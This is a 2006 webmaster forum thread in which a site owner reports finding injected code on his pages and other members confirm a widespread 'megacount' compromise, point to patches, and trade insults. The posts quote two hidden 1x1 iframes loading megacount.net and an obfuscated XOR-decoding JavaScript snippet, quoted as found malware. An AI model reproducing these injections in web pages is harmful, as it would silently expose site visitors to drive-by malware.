Our server seems hacked?? - GoFuckYourself.com

biskoppen · 10-09-2006, 08:41 AM

Just found this HTML in one of our biggest pages .. we didn't place it there

<iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe>
<iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe>

Anyone?

cess · 10-09-2006, 08:43 AM

are you using webair?

SmokeyTheBear · 10-09-2006, 08:43 AM

yup see many threads on megacount hack

Quickdraw · 10-09-2006, 08:43 AM

yep, you have been hacked, and have some work ahead of you. Do a search for megacount and you will have plenty to read

Machete_ · 10-09-2006, 08:44 AM

Yes, its compromiced.
There are a few posts about it here as well. It hit Webair pretty hard including one of our virtual plans

gooddomains · 10-09-2006, 08:44 AM

you've been hacked

SmokeyTheBear · 10-09-2006, 08:44 AM

p.s. put "megacount" in google for thread

gooddomains · 10-09-2006, 08:46 AM

welcome to the club

biskoppen · 10-09-2006, 08:47 AM

Quote:

Originally Posted by cess

are you using webair?

Nope, JupiterHosting

Machete_ · 10-09-2006, 08:48 AM

http://www.grisoft.com/doc/trial/lng.../tpl01?prd=asw

download the trial and clean up your PC. It installs a trojan and 2 counts of malware

Machete_ · 10-09-2006, 08:49 AM

BTW. the site in your Sig in infected as well - please remove it before someone click it

biskoppen · 10-09-2006, 08:59 AM

Finding this code on some of our index files as well..

<script language="JavaScript">e = '0x00' + '3D';str1 = "%86%DE%D5%C8%A2%CF%CE%C5%D6%D9%81%9C%C8%D5%CF%D5% DC%D5%D6%D5%CE%C5%84%DA%D5%DE%DE%D9%D0%9C%80%86%D5 %D8%CC%DD%D1%D9%A2%CF%CC%DF%81%9C%DA%CE%CE%D2%84%9 3%93%DF%D6%C8%DF%D0%CE%90%DF%D3%D1%93%CE%CC%D8%93% 9C%A2%CB%D5%DE%CE%DA%81%8D%A2%DA%D9%D5%DB%DA%CE%81 %8D%80%86%93%D5%D8%CC%DD%D1%D9%80%86%93%DE%D5%C8%8 0";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

gooddomains · 10-09-2006, 09:00 AM

start reinstalling your servers, you are distributing trojans

biskoppen · 10-09-2006, 09:02 AM

Quote:

Originally Posted by gooddomains

start reinstalling your servers, you are distributing trojans

Really?? So this is much more that the altered HTML I'm finding?

DateDoc · 10-09-2006, 09:04 AM

http://www.gfy.com/fucking-around-and-business-discussion/662380-hacked-megacount-net.html
http://www.gfy.com/fucking-around-and-business-discussion/660506-getting-hacked.html
http://www.gfy.com/fucking-around-and-business-discussion/661811-responce-2-getting-hacked.html
http://www.gfy.com/fucking-around-and-business-discussion/662468-martina-warren-trojan-site.html

dissipate · 10-09-2006, 09:05 AM

When the fuck will people start securing thier shit *shakes head*

Machete_ · 10-09-2006, 09:15 AM

Quote:

Originally Posted by dissipate

When the fuck will people start securing thier shit *shakes head*

you should read up on the topic before making bullshit comments like that. It's among other things a hole in PhP and Cpanel. not something you can fix yourself

gooddomains · 10-09-2006, 09:32 AM

Quote:

Originally Posted by biskoppen

Really?? So this is much more that the altered HTML I'm finding?

you are probabbly webmaster number 25612 that got infected, it's been a security whole now for weeks with patches available, only seems everyone is too lazy to install them

dissipate · 10-09-2006, 09:35 AM

Quote:

Originally Posted by ebus_dk

you should read up on the topic before making bullshit comments like that. It's among other things a hole in PhP and Cpanel. not something you can fix yourself

I'm well aware of what this asshat has been doing, they're also VERY easily fixed.

http://www.securiteam.com/unixfocus/6R0030UH5W.html
http://www.securiteam.com/unixfocus/6M00315H5S.html

Takes all of 3 minutes to patch.

Now don't you have postwhores to steal domains from or somthing?

Machete_ · 10-09-2006, 09:52 AM

Quote:

Originally Posted by dissipate

Now don't you have postwhores to steal domains from or somthing?

dissipate
Join Date: Nov 2005
Posts: 5,787

.. maybe I should check your domains

dissipate · 10-09-2006, 09:59 AM

Quote:

Originally Posted by ebus_dk

\
.. maybe I should check your domains

Was the intended to somehow worry me?

dissipate · 10-09-2006, 10:04 AM

Oct 9 07:36:24 strife sshd[4128]: Failed password for root from 83.73.6.174 port 1408 ssh2

Awww, looks like someone from denmark is trying to brute force one of my machines.

I wonder who this could be.

Machete_ · 10-09-2006, 10:30 AM

Quote:

Originally Posted by dissipate

Oct 9 07:36:24 strife sshd[4128]: Failed password for root from 83.73.6.174 port 1408 ssh2

Awww, looks like someone from denmark is trying to brute force one of my machines.

I wonder who this could be.

give me a fucking break. My servers get proped 24/7 from proxyes all around the world.. grow the hell up !! All you did was check you logs to see if a danish Host had loaded one of your sig banners. Sorry to tell you that the IP listed is not mine

dissipate · 10-09-2006, 10:44 AM

Quote:

Originally Posted by ebus_dk

give me a fucking break. My servers get proped 24/7 from proxyes all around the world.. grow the hell up !! All you did was check you logs to see if a danish Host had loaded one of your sig banners. Sorry to tell you that the IP listed is not mine

One hell of a coincidence then, eh? Danish Guy makes comment about looking at my boxes... and im getting ssh connections from a danish IP.

Machete_ · 10-09-2006, 11:02 AM

Quote:

Originally Posted by dissipate

One hell of a coincidence then, eh? Danish Guy makes comment about looking at my boxes... and im getting ssh connections from a danish IP.

Dude - I LIVE IN SWEDEN !!!!!!!! My company resides in Denmark, and I'm danish, but my house is in Sweden. Its public knowledge here on GFY and have been posted a million times over and over again.

I never commented on your boxes. You made a joke regarding buying a boadwhores domain, and I replied "maybe I should check your domains"

As far as I know you don't use SSH to check for domain expiration - but then again, i'm not as smart as you clearly are.

10-09-2006, 08:41 AM	#1
biskoppen Confirmed User Join Date: Mar 2003 Location: Very small penis Posts: 5,809	Our server seems hacked?? Just found this HTML in one of our biggest pages .. we didn't place it there <iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe> <iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe> Anyone? __________________ Submit my videos to make bank, tons of 5 minute videos offered right here

10-09-2006, 08:43 AM	#2
cess Confirmed User Industry Role: Join Date: Sep 2006 Posts: 2,921	are you using webair? __________________

10-09-2006, 08:43 AM	#3
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	yup see many threads on megacount hack __________________ hatisblack at yahoo.com

10-09-2006, 08:44 AM	#7
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	p.s. put "megacount" in google for thread __________________ hatisblack at yahoo.com

10-09-2006, 08:59 AM	#12
biskoppen Confirmed User Join Date: Mar 2003 Location: Very small penis Posts: 5,809	Finding this code on some of our index files as well.. <script language="JavaScript">e = '0x00' + '3D';str1 = "%86%DE%D5%C8%A2%CF%CE%C5%D6%D9%81%9C%C8%D5%CF%D5% DC%D5%D6%D5%CE%C5%84%DA%D5%DE%DE%D9%D0%9C%80%86%D5 %D8%CC%DD%D1%D9%A2%CF%CC%DF%81%9C%DA%CE%CE%D2%84%9 3%93%DF%D6%C8%DF%D0%CE%90%DF%D3%D1%93%CE%CC%D8%93% 9C%A2%CB%D5%DE%CE%DA%81%8D%A2%DA%D9%D5%DB%DA%CE%81 %8D%80%86%93%D5%D8%CC%DD%D1%D9%80%86%93%DE%D5%C8%8 0";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script> __________________ Submit my videos to make bank, tons of 5 minute videos offered right here

10-09-2006, 08:43 AM	#4
Quickdraw Confirmed User Join Date: Mar 2004 Location: → → → Posts: 1,717	yep, you have been hacked, and have some work ahead of you. Do a search for megacount and you will have plenty to read

10-09-2006, 08:44 AM	#5
Machete_ WINNING! Industry Role: Join Date: Oct 2002 Posts: 14,579	Yes, its compromiced. There are a few posts about it here as well. It hit Webair pretty hard including one of our virtual plans

10-09-2006, 08:44 AM	#6
gooddomains Too lazy to set a custom title Join Date: Jul 2003 Location: Netherlands Posts: 10,127	you've been hacked

10-09-2006, 08:46 AM	#8
gooddomains Too lazy to set a custom title Join Date: Jul 2003 Location: Netherlands Posts: 10,127	welcome to the club

10-09-2006, 08:48 AM	#10
Machete_ WINNING! Industry Role: Join Date: Oct 2002 Posts: 14,579	http://www.grisoft.com/doc/trial/lng.../tpl01?prd=asw download the trial and clean up your PC. It installs a trojan and 2 counts of malware

10-09-2006, 08:49 AM	#11
Machete_ WINNING! Industry Role: Join Date: Oct 2002 Posts: 14,579	BTW. the site in your Sig in infected as well - please remove it before someone click it

10-09-2006, 09:00 AM	#13
gooddomains Too lazy to set a custom title Join Date: Jul 2003 Location: Netherlands Posts: 10,127	start reinstalling your servers, you are distributing trojans

10-09-2006, 09:04 AM	#15
DateDoc Outside looking in. Industry Role: Join Date: Feb 2005 Location: To Hell You Ride Posts: 14,243	http://www.gfy.com/fucking-around-and-business-discussion/662380-hacked-megacount-net.html http://www.gfy.com/fucking-around-and-business-discussion/660506-getting-hacked.html http://www.gfy.com/fucking-around-and-business-discussion/661811-responce-2-getting-hacked.html http://www.gfy.com/fucking-around-and-business-discussion/662468-martina-warren-trojan-site.html __________________

10-09-2006, 09:05 AM	#16
dissipate The Dirty Frenchman Industry Role: Join Date: Nov 2005 Location: Lost Angeles Posts: 8,904	When the fuck will people start securing thier shit shakes head

10-09-2006, 10:04 AM	#22
dissipate The Dirty Frenchman Industry Role: Join Date: Nov 2005 Location: Lost Angeles Posts: 8,904	Oct 9 07:36:24 strife sshd[4128]: Failed password for root from 83.73.6.174 port 1408 ssh2 Awww, looks like someone from denmark is trying to brute force one of my machines. I wonder who this could be. Last edited by dissipate; 10-09-2006 at 10:06 AM..